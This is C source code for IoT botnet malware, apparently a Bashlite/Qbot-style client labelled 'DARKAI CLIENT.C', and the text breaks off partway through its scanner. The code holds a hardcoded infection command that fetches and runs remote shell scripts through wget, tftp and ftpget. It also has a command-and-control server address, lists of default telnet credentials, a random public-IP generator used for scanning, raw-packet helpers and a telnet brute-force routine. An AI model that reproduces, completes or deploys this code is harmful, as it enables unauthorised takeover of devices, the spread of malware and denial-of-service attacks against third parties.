/* Skype: b1narythag0d XMPP: b1nary@nigge.rs Made Date: 7-26-16 */ /* *** DO NOT LEAK THIS SHIT ITS PRIVATE AF *** # ___ __________ ____ _______ _____ _______________.___. ___ # / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ # \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ # | | \ | / | \/ | \ | \\____ | # |______ / |___\____|__ /\____|__ /____|_ // ______| # \/ \/ \/ \/ \/ *** DARKAI CLIENT.C *** */ #define PR_SET_NAME 15 #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *)) #define PAD_RIGHT 1 #define PAD_ZERO 2 #define PRINT_BUF_LEN 12 #define CMD_IAC 255 #define CMD_WILL 251 #define CMD_WONT 252 #define CMD_DO 253 #define CMD_DONT 254 #define OPT_SGA 3 #define STD2_STRING "dts" #define STD2_SIZE 50 #define BUFFER_SIZE 512 #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include char *infectline = "cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; wget http://182.92.176.250/gtop.sh; chmod 667 gtop.sh; sh gtop.sh; tftp 182.92.176.250-c get tftp1.sh; chmod 667 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 182.92.176.250; chmod 667 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 182.92.176.250ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n"; unsigned char *commServer[] = { "182.92.176.250:23" }; char *useragents[] = { "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11", "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3", "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6", "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)", }; int initConnection(); int getBogos(unsigned char *bogomips); int getCores(); int getCountry(unsigned char *buf, int bufsize); void makeRandomStr(unsigned char *buf, int length); int sockprintf(int sock, char *formatStr, ...); char *inet_ntoa(struct in_addr in); int mainCommSock = 0, currentServer = -1, gotIP = 0; uint32_t *pids; uint32_t scanPid; uint64_t numpids = 0; struct in_addr ourIP; unsigned char macAddress[6] = {0}; char *usernames[] = {"root\0", "support\0", "guest\0", "ubnt\0"}; char *passwords[] = {"root\0", "\0", "vizxv\0", "admin\0", "123\0", "1234\0", "12345\0", "123456\0", "support\0", "ubnt\0", "7ujMko0vizxv\0", "dreambox\0", "guest\0"}; #define PHI 0x9e3779b9 static uint32_t Q[4096], c = 362436; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (uint32_t)(t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } void trim(char *str) { int i; int begin = 0; int end = strlen(str) - 1; while (isspace(str[begin])) begin++; while ((end >= begin) && isspace(str[end])) end--; for (i = begin; i <= end; i++) str[i - begin] = str[i]; str[i - begin] = '\0'; } static void printchar(unsigned char **str, int c) { if (str) { **str = c; ++(*str); } else (void)write(1, &c, 1); } static int prints(unsigned char **out, const unsigned char *string, int width, int pad) { register int pc = 0, padchar = ' '; if (width > 0) { register int len = 0; register const unsigned char *ptr; for (ptr = string; *ptr; ++ptr) ++len; if (len >= width) width = 0; else width -= len; if (pad & PAD_ZERO) padchar = '0'; } if (!(pad & PAD_RIGHT)) { for ( ; width > 0; --width) { printchar (out, padchar); ++pc; } } for ( ; *string ; ++string) { printchar (out, *string); ++pc; } for ( ; width > 0; --width) { printchar (out, padchar); ++pc; } return pc; } static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) { unsigned char print_buf[PRINT_BUF_LEN]; register unsigned char *s; register int t, neg = 0, pc = 0; register unsigned int u = i; if (i == 0) { print_buf[0] = '0'; print_buf[1] = '\0'; return prints (out, print_buf, width, pad); } if (sg && b == 10 && i < 0) { neg = 1; u = -i; } s = print_buf + PRINT_BUF_LEN-1; *s = '\0'; while (u) { t = u % b; if( t >= 10 ) t += letbase - '0' - 10; *--s = t + '0'; u /= b; } if (neg) { if( width && (pad & PAD_ZERO) ) { printchar (out, '-'); ++pc; --width; } else { *--s = '-'; } } return pc + prints (out, s, width, pad); } static int print(unsigned char **out, const unsigned char *format, va_list args ) { register int width, pad; register int pc = 0; unsigned char scr[2]; for (; *format != 0; ++format) { if (*format == '%') { ++format; width = pad = 0; if (*format == '\0') break; if (*format == '%') goto out; if (*format == '-') { ++format; pad = PAD_RIGHT; } while (*format == '0') { ++format; pad |= PAD_ZERO; } for ( ; *format >= '0' && *format <= '9'; ++format) { width *= 10; width += *format - '0'; } if( *format == 's' ) { register char *s = (char *)va_arg( args, int ); pc += prints (out, s?s:"(null)", width, pad); continue; } if( *format == 'd' ) { pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a'); continue; } if( *format == 'x' ) { pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a'); continue; } if( *format == 'X' ) { pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A'); continue; } if( *format == 'u' ) { pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a'); continue; } if( *format == 'c' ) { scr[0] = (unsigned char)va_arg( args, int ); scr[1] = '\0'; pc += prints (out, scr, width, pad); continue; } } else { out: printchar (out, *format); ++pc; } } if (out) **out = '\0'; va_end( args ); return pc; } int zprintf(const unsigned char *format, ...) { va_list args; va_start( args, format ); return print( 0, format, args ); } int szprintf(unsigned char *out, const unsigned char *format, ...) { va_list args; va_start( args, format ); return print( &out, format, args ); } int sockprintf(int sock, char *formatStr, ...) { unsigned char *textBuffer = malloc(2048); memset(textBuffer, 0, 2048); char *orig = textBuffer; va_list args; va_start(args, formatStr); print(&textBuffer, formatStr, args); va_end(args); orig[strlen(orig)] = '\n'; zprintf("buf: %s\n", orig); int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL); free(orig); return q; } static int *fdopen_pids; int fdpopen(unsigned char *program, register unsigned char *type) { register int iop; int pdes[2], fds, pid; if (*type != 'r' && *type != 'w' || type[1]) return -1; if (pipe(pdes) < 0) return -1; if (fdopen_pids == NULL) { if ((fds = getdtablesize()) <= 0) return -1; if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1; memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int)); } switch (pid = vfork()) { case -1: close(pdes[0]); close(pdes[1]); return -1; case 0: if (*type == 'r') { if (pdes[1] != 1) { dup2(pdes[1], 1); close(pdes[1]); } close(pdes[0]); } else { if (pdes[0] != 0) { (void) dup2(pdes[0], 0); (void) close(pdes[0]); } (void) close(pdes[1]); } execl("/bin/sh", "sh", "-c", program, NULL); _exit(127); } if (*type == 'r') { iop = pdes[0]; (void) close(pdes[1]); } else { iop = pdes[1]; (void) close(pdes[0]); } fdopen_pids[iop] = pid; return (iop); } int fdpclose(int iop) { register int fdes; sigset_t omask, nmask; int pstat; register int pid; if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1); (void) close(iop); sigemptyset(&nmask); sigaddset(&nmask, SIGINT); sigaddset(&nmask, SIGQUIT); sigaddset(&nmask, SIGHUP); (void) sigprocmask(SIG_BLOCK, &nmask, &omask); do { pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0); } while (pid == -1 && errno == EINTR); (void) sigprocmask(SIG_SETMASK, &omask, NULL); fdopen_pids[fdes] = 0; return (pid == -1 ? -1 : WEXITSTATUS(pstat)); } unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd) { int got = 1, total = 0; while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; } return got == 0 ? NULL : buffer; } static const long hextable[] = { [0 ... 255] = -1, ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ['A'] = 10, 11, 12, 13, 14, 15, ['a'] = 10, 11, 12, 13, 14, 15 }; long parseHex(unsigned char *hex) { long ret = 0; while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++]; return ret; } int wildString(const unsigned char* pattern, const unsigned char* string) { switch(*pattern) { case '\0': return *string; case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1)); case '?': return !(*string && !wildString(pattern+1, string+1)); default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1)); } } int getHost(unsigned char *toGet, struct in_addr *i) { struct hostent *h; if((i->s_addr = inet_addr(toGet)) == -1) return 1; return 0; } void uppercase(unsigned char *str) { while(*str) { *str = toupper(*str); str++; } } int getBogos(unsigned char *bogomips) { int cmdline = open("/proc/cpuinfo", O_RDONLY); char linebuf[4096]; while(fdgets(linebuf, 4096, cmdline) != NULL) { uppercase(linebuf); if(strstr(linebuf, "BOGOMIPS") == linebuf) { unsigned char *pos = linebuf + 8; while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++; while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0; if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00; strcpy(bogomips, pos); close(cmdline); return 0; } memset(linebuf, 0, 4096); } close(cmdline); return 1; } int getCores() { int totalcores = 0; int cmdline = open("/proc/cpuinfo", O_RDONLY); char linebuf[4096]; while(fdgets(linebuf, 4096, cmdline) != NULL) { uppercase(linebuf); if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++; memset(linebuf, 0, 4096); } close(cmdline); return totalcores; } void makeRandomStr(unsigned char *buf, int length) { int i = 0; for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65; } int recvLine(int socket, unsigned char *buf, int bufsize) { memset(buf, 0, bufsize); fd_set myset; struct timeval tv; tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(socket, &myset); int selectRtn, retryCount; if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) { while(retryCount < 10) { sockprintf(mainCommSock, "PING"); tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(socket, &myset); if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) { retryCount++; continue; } break; } } unsigned char tmpchr; unsigned char *cp; int count = 0; cp = buf; while(bufsize-- > 1) { if(recv(mainCommSock, &tmpchr, 1, 0) != 1) { *cp = 0x00; return -1; } *cp++ = tmpchr; if(tmpchr == '\n') break; count++; } *cp = 0x00; // zprintf("recv: %s\n", cp); return count; } int connectTimeout(int fd, char *host, int port, int timeout) { struct sockaddr_in dest_addr; fd_set myset; struct timeval tv; socklen_t lon; int valopt; long arg = fcntl(fd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(fd, F_SETFL, arg); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(port); if(getHost(host, &dest_addr.sin_addr)) return 0; memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)); if (res < 0) { if (errno == EINPROGRESS) { tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&myset); FD_SET(fd, &myset); if (select(fd+1, NULL, &myset, NULL, &tv) > 0) { lon = sizeof(int); getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) return 0; } else return 0; } else return 0; } arg = fcntl(fd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(fd, F_SETFL, arg); return 1; } int listFork() { uint32_t parent, *newpids, i; parent = fork(); if (parent <= 0) return parent; numpids++; newpids = (uint32_t*)malloc((numpids + 1) * 4); for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i]; newpids[numpids - 1] = parent; free(pids); pids = newpids; return parent; } int negotiate(int sock, unsigned char *buf, int len) { unsigned char c; switch (buf[1]) { case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0; case CMD_WILL: case CMD_WONT: case CMD_DO: case CMD_DONT: c = CMD_IAC; send(sock, &c, 1, MSG_NOSIGNAL); if (CMD_WONT == buf[1]) c = CMD_DONT; else if (CMD_DONT == buf[1]) c = CMD_WONT; else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO); else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT); send(sock, &c, 1, MSG_NOSIGNAL); send(sock, &(buf[2]), 1, MSG_NOSIGNAL); break; default: break; } return 0; } int matchPrompt(char *bufStr) { char *prompts = ":>%$#\0"; int bufLen = strlen(bufStr); int i, q = 0; for(i = 0; i < strlen(prompts); i++) { while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++; if(*(bufStr + bufLen - q) == prompts[i]) return 1; } return 0; } int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex) { int bufferUsed = initialIndex, got = 0, found = 0; fd_set myset; struct timeval tv; tv.tv_sec = timeout; tv.tv_usec = timeoutusec; unsigned char *initialRead = NULL; while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0)) { FD_ZERO(&myset); FD_SET(fd, &myset); if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break; initialRead = buffer + bufferUsed; got = recv(fd, initialRead, 1, 0); if(got == -1 || got == 0) return 0; bufferUsed += got; if(*initialRead == 0xFF) { got = recv(fd, initialRead + 1, 2, 0); if(got == -1 || got == 0) return 0; bufferUsed += got; if(!negotiate(fd, initialRead, 3)) return 0; } else { if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; } } } if(found) return 1; return 0; } static uint8_t ipState[5] = {0}; in_addr_t getRandomPublicIP() { if(ipState[1] > 0 && ipState[4] < 255) { ipState[4]++; char ip[16] = {0}; szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]); return inet_addr(ip); } ipState[0] = rand() % 255; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; while( (ipState[0] == 0) || (ipState[0] == 10) || (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) || (ipState[0] == 127) || (ipState[0] == 169 && ipState[1] == 254) || (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) || (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) || (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) || (ipState[0] == 192 && ipState[1] == 168) || (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) || (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) || (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) || (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 52) || (ipState[0] == 188 && ipState[1] == 209 && ipState[2] == 49) || (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 190) || (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 189) || (ipState[0] == 185 && ipState[1] == 62 && ipState[2] == 188) || (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 137) || (ipState[0] == 185 && ipState[1] == 61 && ipState[2] == 136) || (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 147) || (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 146) || (ipState[0] == 185 && ipState[1] == 11 && ipState[2] == 145) || (ipState[0] == 63 && ipState[1] == 141 && ipState[2] == 241) || (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 192) || (ipState[0] == 69 && ipState[1] == 30 && ipState[2] == 244) || (ipState[0] == 69 && ipState[1] == 197 && ipState[2] == 128) || (ipState[0] == 162 && ipState[1] == 251 && ipState[2] == 120) || (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 128) || (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 180) || (ipState[0] == 173 && ipState[1] == 208 && ipState[2] == 250) || (ipState[0] == 192 && ipState[1] == 187 && ipState[2] == 113) || (ipState[0] == 198 && ipState[1] == 204 && ipState[2] == 241) || (ipState[0] == 204 && ipState[1] == 10 && ipState[2] == 160) || (ipState[0] == 204 && ipState[1] == 12 && ipState[2] == 192) || (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 64) || (ipState[0] == 208 && ipState[1] == 110 && ipState[2] == 72) || (ipState[0] == 208 && ipState[1] == 67) || (ipState[0] == 94 && ipState[1] == 102 && ipState[2] == 48) || (ipState[0] == 93 && ipState[1] == 174 && ipState[2] == 88) || (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 174) || (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 172) || (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 170) || (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 169) || (ipState[0] == 89 && ipState[1] == 248 && ipState[2] == 160) || (ipState[0] >= 224) ) { ipState[0] = rand() % 255; ipState[1] = rand() % 255; ipState[2] = rand() % 255; ipState[3] = rand() % 255; } char ip[16] = {0}; szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); return inet_addr(ip); } in_addr_t getRandomIP(in_addr_t netmask) { in_addr_t tmp = ntohl(ourIP.s_addr) & netmask; return tmp ^ ( rand_cmwc() & ~netmask); } unsigned short csum (unsigned short *buf, int count) { register uint64_t sum = 0; while( count > 1 ) { sum += *buf++; count -= 2; } if(count > 0) { sum += *(unsigned char *)buf; } while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } return (uint16_t)(~sum); } unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { struct tcp_pseudo { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; } pseudohead; unsigned short total_len = iph->tot_len; pseudohead.src_addr=iph->saddr; pseudohead.dst_addr=iph->daddr; pseudohead.zero=0; pseudohead.proto=IPPROTO_TCP; pseudohead.length=htons(sizeof(struct tcphdr)); int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); unsigned short *tcp = malloc(totaltcp_len); memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); unsigned short output = csum(tcp,totaltcp_len); free(tcp); return output; } void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + packetSize; iph->id = rand_cmwc(); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = protocol; iph->check = 0; iph->saddr = source; iph->daddr = dest; } int sclose(int fd) { if(3 > fd) return 1; close(fd); return 0; } int socket_connect(char *host, in_port_t port){ struct hostent *hp; struct sockaddr_in addr; int on = 1, sock; if((hp = gethostbyname(host)) == NULL){ herror("gethostbyname"); exit(1); } bcopy(hp->h_addr, &addr.sin_addr, hp->h_length); addr.sin_port = htons(port); addr.sin_family = AF_INET; sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)); if(sock == -1){ perror("setsockopt"); exit(1); } if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){ perror("connect"); exit(1); } return sock; } void echoLoader() { char buffer[BUFFER_SIZE]; int fd; fd = socket_connect("0.0.0.0", 80); write(fd, "GET gtop.sh\r\n", strlen("GET gtop.sh\r\n")); // write(fd, char[]*, len); bzero(buffer, BUFFER_SIZE); while(read(fd, buffer, BUFFER_SIZE - 1) != 0){ FILE *f; f = fopen("x", "a"); fprintf(f, "%s", buffer); fclose(f); bzero(buffer, BUFFER_SIZE); } shutdown(fd, SHUT_RDWR); close(fd); } void TelnetScanner() { int max = (getdtablesize() / 4) * 3, i, res; fd_set myset; struct timeval tv; socklen_t lon; int valopt; max = max > 512 ? 512 : max; struct sockaddr_in dest_addr; dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); struct telstate_t { int fd; uint32_t ip; uint8_t state; uint8_t complete; uint8_t usernameInd; uint8_t passwordInd; uint32_t totalTimeout; uint16_t bufUsed; char *sockbuf; } fds[max]; memset(fds, 0, max * (sizeof(int) + 1)); for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); } struct timeval timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; while(1) { for(i = 0; i < max; i++) { switch(fds[i].state) { case 0: { memset(fds[i].sockbuf, 0, 1024); if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); } else { fds[i].passwordInd++; if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; } if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; } } dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(23); memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero); dest_addr.sin_addr.s_addr = fds[i].ip; fds[i].fd = socket(AF_INET, SOCK_STREAM, 0); setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)); setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)); if(fds[i].fd == -1) { continue; } fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK); if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; } else { fds[i].state = 1; fds[i].totalTimeout = 0; } } break; case 1: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); FD_ZERO(&myset); FD_SET(fds[i].fd, &myset); tv.tv_sec = 0; tv.tv_usec = 10000; res = select(fds[i].fd+1, NULL, &myset, NULL, &tv); if(res == 1) { lon = sizeof(int); valopt = 0; getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if(valopt) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } else { fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK)); fds[i].totalTimeout = 0; fds[i].bufUsed = 0; memset(fds[i].sockbuf, 0, 1024); fds[i].state = 2; continue; } } else if(res == -1) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 2: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "ogin:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "user:", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "name", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "pass", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else if(readUntil(fds[i].fd, "word", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "assword:") != NULL) fds[i].state = 5; else memset(fds[i].sockbuf, 0, 1024); fds[i].state = 3; continue; } else { fds[i].bufUsed = strlen(fds[i].sockbuf); } if(fds[i].totalTimeout + 10 < time(NULL)) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; } } break; case 3: { if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; } fds[i].state = 4; } break; case 4: { if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL); if(readUntil(fds[i].fd, "pass", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "pass") != NULL) fds[i].state = 5; else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } if(readUntil(fds[i].fd, "word", 1, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed)) { fds[i].totalTimeout = 0; fds[i].bufUsed = 0; if(strstr(fds[i].sockbuf, "word") != NULL) fds[i].state = 5; else fds[i].state = 7; memset(fds[i].sockbuf, 0, 1024); continue; } else { if(strstr(fds[i].sockbuf, "invalid") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "incorrect") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "fail") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "again") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "wrong") != NULL) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 0; continue; } if(strstr(fds[i].sockbuf, "accessdenied") 